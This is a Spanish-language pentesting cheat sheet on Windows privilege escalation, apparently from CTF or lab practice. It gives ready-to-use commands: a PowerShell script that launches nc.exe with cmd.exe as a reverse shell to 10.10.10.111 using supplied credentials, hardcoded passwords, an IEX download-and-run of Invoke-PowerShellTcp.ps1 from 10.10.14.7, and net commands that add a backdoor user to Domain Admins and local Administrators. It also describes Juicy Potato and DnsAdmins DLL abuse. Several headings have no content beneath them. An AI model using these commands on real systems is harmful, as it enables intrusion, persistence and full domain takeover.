Windows Privilege Escalation
Obtener shell reverse con otro usuario teniendo sus credenciales por medio de un script.ps1
## DOMINIO ##
$secpasswd = ConvertTo-SecureString "aliceishere" -AsPlainText -Force
$mycreds = New-Object System.Management.Automation.PSCredential ("alice", $secpasswd)
$computer = "Bethany"
[System.Diagnostics.Process]::Start("C:\Users\Public\Downloads\nc.exe","10.10.10.111 5555 -e C:\Windows\system32\cmd.exe", $mycreds.Username, $mycreds.Password, $computer)
## LOCALMENTE PSREMOTING ##
$username = "BART\Administrator"
$password = "3130438f31186fbaf962f407711faddb"
$secstr = New-Object -TypeName System.Security.SecureString
$password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)}
$cred = new-object -typename System.Management.Automation.PSCredential -argumentlist $username, $secstr
Invoke-Command -ScriptBlock { IEX(New-Object Net.WebClient).downloadString('http://10.10.14.7/Invoke-PowerShellTcp.ps1') } -Credential $cred -Computer localhostCreacion de usuarios con NET
# Listado de usuarios y grupos
net user
net group
net localgroup
# Creacion de Usuario en Domain Controller
net user gerh Tomas123 /add /domain
net group "Domain Admins" gerh /add /domain
# Creacion de Usuario en localgroup
net user gerh Pass123 /add
net localgroup Administrators gerh /add
net localgroup "Remote Desktop Users" gerh /add
net localgroup "Remote Management Users" gerh /add Impersonating Privileges with Juicy Potato
Un servidor COM es un ejecutable (EXE o DLL) que implementa un conjunto de objetos COM. Los componentes de Windows se implementan como objetos COM y siguen reglas COM estándar para comunicarse entre sí. Los servidores COM están registrados en el Registro y tienen un Class ID (CLSID) y un APPID
Si esta habilitado el SeImpersonatePrivilege || SeAssignPrimaryTokenPrivilege en TRUE se realiza lo siguiente:
Compilación de Exploits con mingw32-gcc
Escalación de privilegios dentro de un Active Directory por medio de un usuario del grupo DNSAdmins
Los miembros de este grupo pueden administrar DNS. Los controladores de dominio suelen servir también como servidores DNS, por lo que Microsoft preparó un protocolo de gestión basado en RPC. Un usuario que pertenece al grupo DnsAdmins puede cargar arbitrariamente un controlador DLL y su ruta no se verifica. Según Microsoft, la operación "ServerLevelPluginDll" se realiza en tal caso. El usuario puede modificar la configuración de las DLL, que están cargadas, con dnscmd.exe (el ejecutable es parte de DNS Server Tools). Esta característica no se trata como una vulnerabilidad, pero su abuso puede conducir a la ejecución de una DLL maliciosa en el contexto de los privilegios del SISTEMA.
Por medio de windows-exploit-suggester.py
Validacion de la arquitectura de windows con powershell
Última actualización